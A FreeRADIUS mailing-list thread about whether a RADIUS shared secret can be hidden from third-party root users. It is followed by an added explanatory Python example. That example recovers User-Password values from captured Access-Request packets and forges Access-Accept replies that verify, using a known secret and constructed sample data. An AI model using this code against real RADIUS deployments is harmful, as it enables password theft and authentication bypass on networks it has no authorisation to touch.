Hiding "secret" used for PAM authentication

Gregory Machin gregory.machin at gmail.com
Sun Nov 20 22:34:03 CET 2011


Firstly these are not my servers, or my department. My role is limited
to provisioning the radius server. I did suggest restricted access,
sudo, etc., and that didn't fly. I was asked what the implications of the
shared secret being visible are, and if there is a way to obfuscate
it.

I will forward on this commentary to the relevant persons and leave it
with them.

Thanks
G

On Sun, Nov 20, 2011 at 4:35 AM, John Dennis <jdennis at redhat.com> wrote:
> On 11/18/2011 07:33 PM, Gregory Machin wrote:
>>
>> Hi.
>> We are using PAM to authenticate users against Freeradius, and
>> that is working well. The problem is that the users are 3rd party
>> developers and some need root access. The issue we have is that the
>> radius secret is stored in a clear text file. How can this be hidden so
>> that it can't be misused?
>>
>> Is there a document on hardening Freeradius ?
>
> Giving 3rd party users root access to servers with sensitive information is
> dumb. Nothing is protected once you have root. You need to seriously
> reconsider why anybody except a trusted small group of admins need root.
>
> I can't seriously believe you're asking a question about hardening after
> declaring you intend to give root away. The very first rule of hardening is
> to restrict root access, all hardening efforts are a complete waste of time
> once root is compromised.
>
>
> --
> John Dennis <jdennis at redhat.com>
>
> Looking to carve out IT costs?
> www.redhat.com/carveoutcosts/
>
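To make concrete what "the shared secret being visible" implies, here is an added example (not part of this thread, and not FreeRADIUS's own code) that walks through the two RFC 2865 operations the secret protects. Anyone who can read the secret out of clients.conf and capture RADIUS traffic on the wire can (1) recover every User-Password carried in Access-Request packets, because the RFC 2865 password hiding is MD5(secret + authenticator) XOR password, and (2) mint an Access-Accept whose Response Authenticator the NAS will accept, because that authenticator is just MD5 over the reply with the secret appended. Obfuscating the file does not change this: the daemon must be able to read the secret, so root can too. The secret `testing123`, the authenticator bytes, the user name, the password and the NAS address below are all constructed for the example; the Message-Authenticator HMAC from RFC 2869 is omitted, but a holder of the secret can compute it just as easily.

```python
"""RFC 2865 User-Password hiding and Response Authenticator, reimplemented to
show what a leaked RADIUS shared secret lets an attacker do.
Example code written for this thread, not FreeRADIUS's own; all packet
contents and the secret are constructed sample values."""
import hashlib
import hmac
import struct

ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2
USER_NAME, USER_PASSWORD, NAS_IP_ADDRESS, REPLY_MESSAGE = 1, 2, 4, 18


def _md5(data: bytes) -> bytes:
    return hashlib.md5(data).digest()


def hide_password(password: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """RFC 2865 5.2: NUL-pad to a multiple of 16, then XOR block i with
    MD5(secret + previous ciphertext block), seeded by the Request Authenticator."""
    if len(request_auth) != 16:
        raise ValueError("Request Authenticator must be 16 bytes")
    if not 1 <= len(password) <= 128:
        raise ValueError("User-Password is limited to 1..128 bytes")
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = bytearray(), request_auth
    for i in range(0, len(padded), 16):
        keystream = _md5(secret + prev)
        cipher = bytes(a ^ b for a, b in zip(padded[i:i + 16], keystream))
        out += cipher
        prev = cipher
    return bytes(out)


def reveal_password(hidden: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """Inverse of hide_password: the keystream depends only on the secret and
    data visible in the packet, so the secret alone unlocks captured passwords.
    Trailing NUL padding is stripped (a password cannot end in NUL under RFC 2865)."""
    if not hidden or len(hidden) % 16:
        raise ValueError("hidden User-Password must be a non-empty multiple of 16 bytes")
    out, prev = bytearray(), request_auth
    for i in range(0, len(hidden), 16):
        keystream = _md5(secret + prev)
        chunk = hidden[i:i + 16]
        out += bytes(a ^ b for a, b in zip(chunk, keystream))
        prev = chunk
    return bytes(out).rstrip(b"\x00")


def _encode_attrs(attrs):
    # Each attribute is Type(1) Length(1, includes header) Value.
    return b"".join(struct.pack("!BB", t, len(v) + 2) + v for t, v in attrs)


def build_packet(code: int, ident: int, authenticator: bytes, attrs) -> bytes:
    body = _encode_attrs(attrs)
    return struct.pack("!BBH", code, ident, 20 + len(body)) + authenticator + body


def parse_attrs(packet: bytes):
    """Walk the attribute TLVs after the 20-byte header, rejecting bad lengths."""
    attrs, pos = [], 20
    while pos < len(packet):
        t, length = packet[pos], packet[pos + 1]
        if length < 2 or pos + length > len(packet):
            raise ValueError("malformed attribute at offset %d" % pos)
        attrs.append((t, packet[pos + 2:pos + length]))
        pos += length
    return attrs


def response_authenticator(code, ident, request_auth, attrs, secret) -> bytes:
    """RFC 2865 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    body = _encode_attrs(attrs)
    header = struct.pack("!BBH", code, ident, 20 + len(body))
    return _md5(header + request_auth + body + secret)


def forge_access_accept(request: bytes, secret: bytes) -> bytes:
    """With the secret, an attacker who sees an Access-Request can answer it
    with an Access-Accept the NAS cannot distinguish from the real server's."""
    ident, request_auth = request[1], request[4:20]
    attrs = [(REPLY_MESSAGE, b"Welcome")]
    auth = response_authenticator(ACCESS_ACCEPT, ident, request_auth, attrs, secret)
    return build_packet(ACCESS_ACCEPT, ident, auth, attrs)


def verify_response(response: bytes, request_auth: bytes, secret: bytes) -> bool:
    """What a NAS does on receipt: recompute the Response Authenticator."""
    expected = response_authenticator(response[0], response[1], request_auth,
                                      parse_attrs(response), secret)
    return hmac.compare_digest(expected, response[4:20])


def demo():
    secret = b"testing123"                                       # constructed
    request_auth = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")  # constructed
    password = b"S3cr3tPass!"                                    # constructed
    request = build_packet(ACCESS_REQUEST, 7, request_auth, [
        (USER_NAME, b"developer"),
        (USER_PASSWORD, hide_password(password, secret, request_auth)),
        (NAS_IP_ADDRESS, bytes([192, 0, 2, 10])),
    ])
    # An eavesdropper holding the secret recovers the password from the capture...
    hidden = dict(parse_attrs(request))[USER_PASSWORD]
    recovered = reveal_password(hidden, secret, request_auth)
    # ...and can forge an Access-Accept that passes the NAS's check.
    accept = forge_access_accept(request, secret)
    return {"recovered": recovered,
            "forged_accepted": verify_response(accept, request_auth, secret)}


if __name__ == "__main__":
    print(demo())
```

Run as-is to see the constructed password come back out of the packet and the forged Access-Accept verify. The point for the discussion above is that neither step needs anything beyond the secret and the bytes already on the wire, which is why no amount of obfuscating clients.conf helps once someone has root on the host that must read it.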




More information about the Freeradius-Users mailing list